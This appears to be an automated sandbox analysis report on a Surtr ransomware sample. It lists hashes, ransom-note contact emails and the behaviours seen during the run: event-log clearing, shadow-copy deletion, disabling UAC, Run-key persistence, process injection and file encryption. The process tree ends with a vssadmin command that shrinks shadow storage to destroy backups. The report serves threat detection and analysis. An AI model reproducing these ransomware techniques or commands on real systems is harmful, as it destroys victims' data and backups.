Analysis
-
max time kernel
128s -
max time network
124s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-12-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
surtr.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
surtr.exe
Resource
win10-en-20211208
General
-
Target
surtr.exe
-
Size
320KB
-
MD5
e6fc190168519d6a6c4f1519e9450f0f
-
SHA1
af2080ddf1064fb80c7b9af942aaabf264441098
-
SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
-
SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
Malware Config
Extracted
C:\ProgramData\Service\SURTR_README.txt
DecryptMyData@mailfence.com
Decrypter@msgsafe.io
Extracted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
surtr
DecryptMyData@mailfence.com
Decrypter@msgsafe.io
Signatures
-
Detects Surtr Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/956-60-0x0000000140133F50-mapping.dmp family_surtr behavioral1/memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr -
Surtr
Ransomware family first seen in late 2021.
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Clears Windows event logs 1 TTPs 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepid process 2844 wevtutil.exe 1364 wevtutil.exe 2748 3644 wevtutil.exe 1064 wevtutil.exe 3464 wevtutil.exe 3768 wevtutil.exe 4080 3484 3448 wevtutil.exe 3684 wevtutil.exe 2940 3252 3504 3836 1056 wevtutil.exe 3128 wevtutil.exe 2092 wevtutil.exe 2508 wevtutil.exe 3824 wevtutil.exe 3824 wevtutil.exe 3180 wevtutil.exe 2548 wevtutil.exe 812 2616 1608 wevtutil.exe 4092 wevtutil.exe 2132 wevtutil.exe 2764 wevtutil.exe 1588 3720 wevtutil.exe 1752 4040 3108 3104 wevtutil.exe 468 wevtutil.exe 1928 wevtutil.exe 4052 1532 2260 852 wevtutil.exe 3296 1016 wevtutil.exe 3628 3080 1676 wevtutil.exe 2468 wevtutil.exe 3964 wevtutil.exe 3640 wevtutil.exe 2892 3200 wevtutil.exe 3240 1860 wevtutil.exe 2040 wevtutil.exe 2056 wevtutil.exe 3676 wevtutil.exe 3208 2900 2832 3260 1928 3384 wevtutil.exe 3852 wevtutil.exe 2188 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3680 bcdedit.exe 3760 bcdedit.exe -
Blocklisted process makes network request 5 IoCs
Processes:
flow pid process 6 3568 7 3568 9 3568 11 3568 13 3568 -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Processes:
resource yara_rule behavioral1/memory/956-56-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/956-58-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/956-59-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/956-62-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral1/memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp upx -
Drops startup file 7 IoCs
Processes:
cmd.execmd.execmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
Enumerates connected drives 3 TTPs 49 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exesurtr.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\Q: vssadmin.exe File opened (read-only) \??\Y: vssadmin.exe File opened (read-only) \??\K: surtr.exe File opened (read-only) \??\W: surtr.exe File opened (read-only) \??\V: vssadmin.exe File opened (read-only) \??\T: vssadmin.exe File opened (read-only) \??\J: vssadmin.exe File opened (read-only) \??\Q: surtr.exe File opened (read-only) \??\X: surtr.exe File opened (read-only) \??\N: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\S: vssadmin.exe File opened (read-only) \??\Z: surtr.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\N: surtr.exe File opened (read-only) \??\O: surtr.exe File opened (read-only) \??\K: vssadmin.exe File opened (read-only) \??\M: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\Y: surtr.exe File opened (read-only) \??\B: surtr.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\U: vssadmin.exe File opened (read-only) \??\L: vssadmin.exe File opened (read-only) \??\L: surtr.exe File opened (read-only) \??\P: surtr.exe File opened (read-only) \??\R: surtr.exe File opened (read-only) \??\T: surtr.exe File opened (read-only) \??\V: surtr.exe File opened (read-only) \??\Z: vssadmin.exe File opened (read-only) \??\X: vssadmin.exe File opened (read-only) \??\I: surtr.exe File opened (read-only) \??\E: surtr.exe File opened (read-only) \??\S: surtr.exe File opened (read-only) \??\P: vssadmin.exe File opened (read-only) \??\B: vssadmin.exe File opened (read-only) \??\I: vssadmin.exe File opened (read-only) \??\U: surtr.exe File opened (read-only) \??\W: vssadmin.exe File opened (read-only) \??\G: surtr.exe File opened (read-only) \??\H: surtr.exe File opened (read-only) \??\F: surtr.exe File opened (read-only) \??\J: surtr.exe File opened (read-only) \??\M: surtr.exe File opened (read-only) \??\A: surtr.exe File opened (read-only) \??\R: vssadmin.exe File opened (read-only) \??\A: vssadmin.exe File opened (read-only) \??\O: vssadmin.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
surtr.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg" surtr.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
surtr.exedescription pid process target process PID 1448 set thread context of 956 1448 surtr.exe surtr.exe -
Drops file in Program Files directory 64 IoCs
Processes:
surtr.exedescription ioc process File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\highlight.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_pl.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01064_.WMF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS0009.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21336_.GIF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\7-Zip\License.txt.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipTsf.dll.mui.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jre7\bin\jfxmedia.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\msdarem.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR17F.GIF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\librotate_plugin.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Barbados.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Windows Media Player\Media Renderer\RenderingControl.xml.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099164.WMF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\msdasql.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_hu.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.XML.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libfloat_mixer_plugin.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NAVBAR11.POC.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\mshwgst.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\ConvertToUnpublish.pps.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\library.js.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\NPAUTHZ.DLL.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\ALARM.WAV.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBlankPage.html.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSPST32.DLL.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL104.XML.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\cpu.js.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0196400.WMF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT.[DecryptMyData@mailfence.com].SURT surtr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 520 2704 schtasks.exe 3620 schtasks.exe -
Interacts with shadow copies 2 TTPs 27 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 2364 vssadmin.exe 2372 vssadmin.exe 2468 vssadmin.exe 2084 vssadmin.exe 2168 vssadmin.exe 2180 vssadmin.exe 2060 vssadmin.exe 2092 vssadmin.exe 2152 vssadmin.exe 2188 vssadmin.exe 2504 vssadmin.exe 1676 vssadmin.exe 2104 vssadmin.exe 2128 vssadmin.exe 2052 vssadmin.exe 888 vssadmin.exe 2332 vssadmin.exe 2112 vssadmin.exe 2140 vssadmin.exe 2412 vssadmin.exe 2204 vssadmin.exe 2380 vssadmin.exe 2480 vssadmin.exe 2488 vssadmin.exe 520 vssadmin.exe 1108 vssadmin.exe 2120 vssadmin.exe -
Processes:
description ioc process Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main -
Modifies registry class 5 IoCs
Processes:
description ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico" Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.surt Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file" Key created \REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon Key created \REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
pid process 3540 -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
surtr.exepid process 956 surtr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
vssvc.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exedescription pid process Token: SeBackupPrivilege 2680 vssvc.exe Token: SeRestorePrivilege 2680 vssvc.exe Token: SeAuditPrivilege 2680 vssvc.exe Token: SeSecurityPrivilege 4092 wevtutil.exe Token: SeBackupPrivilege 4092 wevtutil.exe Token: SeSecurityPrivilege 2360 wevtutil.exe Token: SeBackupPrivilege 2360 wevtutil.exe Token: SeSecurityPrivilege 2816 wevtutil.exe Token: SeBackupPrivilege 2816 wevtutil.exe Token: SeSecurityPrivilege 3220 wevtutil.exe Token: SeBackupPrivilege 3220 wevtutil.exe Token: SeSecurityPrivilege 2364 wevtutil.exe Token: SeBackupPrivilege 2364 wevtutil.exe Token: SeSecurityPrivilege 1608 wevtutil.exe Token: SeBackupPrivilege 1608 wevtutil.exe Token: SeSecurityPrivilege 2264 wevtutil.exe Token: SeBackupPrivilege 2264 wevtutil.exe Token: SeSecurityPrivilege 2392 wevtutil.exe Token: SeBackupPrivilege 2392 wevtutil.exe Token: SeSecurityPrivilege 2416 wevtutil.exe Token: SeBackupPrivilege 2416 wevtutil.exe Token: SeSecurityPrivilege 3376 wevtutil.exe Token: SeBackupPrivilege 3376 wevtutil.exe Token: SeSecurityPrivilege 3424 wevtutil.exe Token: SeBackupPrivilege 3424 wevtutil.exe Token: SeSecurityPrivilege 612 wevtutil.exe Token: SeBackupPrivilege 612 wevtutil.exe Token: SeSecurityPrivilege 1860 wevtutil.exe Token: SeBackupPrivilege 1860 wevtutil.exe Token: SeSecurityPrivilege 1280 wevtutil.exe Token: SeBackupPrivilege 1280 wevtutil.exe Token: SeSecurityPrivilege 2280 wevtutil.exe Token: SeBackupPrivilege 2280 wevtutil.exe Token: SeSecurityPrivilege 1640 wevtutil.exe Token: SeBackupPrivilege 1640 wevtutil.exe Token: SeSecurityPrivilege 1684 wevtutil.exe Token: SeBackupPrivilege 1684 wevtutil.exe Token: SeSecurityPrivilege 3324 wevtutil.exe Token: SeBackupPrivilege 3324 wevtutil.exe Token: SeSecurityPrivilege 3508 wevtutil.exe Token: SeBackupPrivilege 3508 wevtutil.exe Token: SeSecurityPrivilege 3532 wevtutil.exe Token: SeBackupPrivilege 3532 wevtutil.exe Token: SeSecurityPrivilege 3516 wevtutil.exe Token: SeBackupPrivilege 3516 wevtutil.exe Token: SeSecurityPrivilege 3548 wevtutil.exe Token: SeBackupPrivilege 3548 wevtutil.exe Token: SeSecurityPrivilege 3364 wevtutil.exe Token: SeBackupPrivilege 3364 wevtutil.exe Token: SeSecurityPrivilege 3576 wevtutil.exe Token: SeBackupPrivilege 3576 wevtutil.exe Token: SeSecurityPrivilege 3564 wevtutil.exe Token: SeBackupPrivilege 3564 wevtutil.exe Token: SeSecurityPrivilege 3644 wevtutil.exe Token: SeBackupPrivilege 3644 wevtutil.exe Token: SeSecurityPrivilege 3628 wevtutil.exe Token: SeBackupPrivilege 3628 wevtutil.exe Token: SeSecurityPrivilege 3720 wevtutil.exe Token: SeBackupPrivilege 3720 wevtutil.exe Token: SeSecurityPrivilege 3824 wevtutil.exe Token: SeBackupPrivilege 3824 wevtutil.exe Token: SeSecurityPrivilege 3800 wevtutil.exe Token: SeBackupPrivilege 3800 wevtutil.exe Token: SeSecurityPrivilege 3840 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
surtr.exesurtr.execmd.exedescription pid process target process PID 1448 wrote to memory of 956 1448 surtr.exe surtr.exe PID 1448 wrote to memory of 956 1448 surtr.exe surtr.exe PID 1448 wrote to memory of 956 1448 surtr.exe surtr.exe PID 1448 wrote to memory of 956 1448 surtr.exe surtr.exe PID 1448 wrote to memory of 956 1448 surtr.exe surtr.exe PID 1448 wrote to memory of 956 1448 surtr.exe surtr.exe PID 1448 wrote to memory of 956 1448 surtr.exe surtr.exe PID 956 wrote to memory of 468 956 surtr.exe cmd.exe PID 956 wrote to memory of 468 956 surtr.exe cmd.exe PID 956 wrote to memory of 468 956 surtr.exe cmd.exe PID 956 wrote to memory of 524 956 surtr.exe cmd.exe PID 956 wrote to memory of 524 956 surtr.exe cmd.exe PID 956 wrote to memory of 524 956 surtr.exe cmd.exe PID 956 wrote to memory of 360 956 surtr.exe cmd.exe PID 956 wrote to memory of 360 956 surtr.exe cmd.exe PID 956 wrote to memory of 360 956 surtr.exe cmd.exe PID 360 wrote to memory of 736 360 cmd.exe chcp.com PID 360 wrote to memory of 736 360 cmd.exe chcp.com PID 360 wrote to memory of 736 360 cmd.exe chcp.com PID 956 wrote to memory of 1228 956 surtr.exe cmd.exe PID 956 wrote to memory of 1228 956 surtr.exe cmd.exe PID 956 wrote to memory of 1228 956 surtr.exe cmd.exe PID 956 wrote to memory of 1784 956 surtr.exe cmd.exe PID 956 wrote to memory of 1784 956 surtr.exe cmd.exe PID 956 wrote to memory of 1784 956 surtr.exe cmd.exe PID 956 wrote to memory of 1356 956 surtr.exe cmd.exe PID 956 wrote to memory of 1356 956 surtr.exe cmd.exe PID 956 wrote to memory of 1356 956 surtr.exe cmd.exe PID 956 wrote to memory of 1812 956 surtr.exe cmd.exe PID 956 wrote to memory of 1812 956 surtr.exe cmd.exe PID 956 wrote to memory of 1812 956 surtr.exe cmd.exe PID 956 wrote to memory of 416 956 surtr.exe cmd.exe PID 956 wrote to memory of 416 956 surtr.exe cmd.exe PID 956 wrote to memory of 416 956 surtr.exe cmd.exe PID 956 wrote to memory of 1640 956 surtr.exe cmd.exe PID 956 wrote to memory of 1640 956 surtr.exe cmd.exe PID 956 wrote to memory of 1640 956 surtr.exe cmd.exe PID 956 wrote to memory of 1468 956 surtr.exe cmd.exe PID 956 wrote to memory of 1468 956 surtr.exe cmd.exe PID 956 wrote to memory of 1468 956 surtr.exe cmd.exe PID 956 wrote to memory of 1484 956 surtr.exe cmd.exe PID 956 wrote to memory of 1484 956 surtr.exe cmd.exe PID 956 wrote to memory of 1484 956 surtr.exe cmd.exe PID 956 wrote to memory of 1476 956 surtr.exe cmd.exe PID 956 wrote to memory of 1476 956 surtr.exe cmd.exe PID 956 wrote to memory of 1476 956 surtr.exe cmd.exe PID 956 wrote to memory of 1860 956 surtr.exe cmd.exe PID 956 wrote to memory of 1860 956 surtr.exe cmd.exe PID 956 wrote to memory of 1860 956 surtr.exe cmd.exe PID 956 wrote to memory of 1500 956 surtr.exe cmd.exe PID 956 wrote to memory of 1500 956 surtr.exe cmd.exe PID 956 wrote to memory of 1500 956 surtr.exe cmd.exe PID 956 wrote to memory of 1200 956 surtr.exe cmd.exe PID 956 wrote to memory of 1200 956 surtr.exe cmd.exe PID 956 wrote to memory of 1200 956 surtr.exe cmd.exe PID 956 wrote to memory of 1824 956 surtr.exe cmd.exe PID 956 wrote to memory of 1824 956 surtr.exe cmd.exe PID 956 wrote to memory of 1824 956 surtr.exe cmd.exe PID 956 wrote to memory of 992 956 surtr.exe cmd.exe PID 956 wrote to memory of 992 956 surtr.exe cmd.exe PID 956 wrote to memory of 992 956 surtr.exe cmd.exe PID 956 wrote to memory of 1736 956 surtr.exe cmd.exe PID 956 wrote to memory of 1736 956 surtr.exe cmd.exe PID 956 wrote to memory of 1736 956 surtr.exe cmd.exe -
Views/modifies file attributes 1 TTPs 8 IoCs
Processes:
attrib.exeattrib.exepid process 2372 1640 1828 3476 1924 212 2504 attrib.exe 1524 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\surtr.exe"C:\Users\Admin\AppData\Local\Temp\surtr.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\surtr.exe"C:\Users\Admin\AppData\Local\Temp\surtr.exe"2⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo off3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4373⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 4374⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB3⤵
-
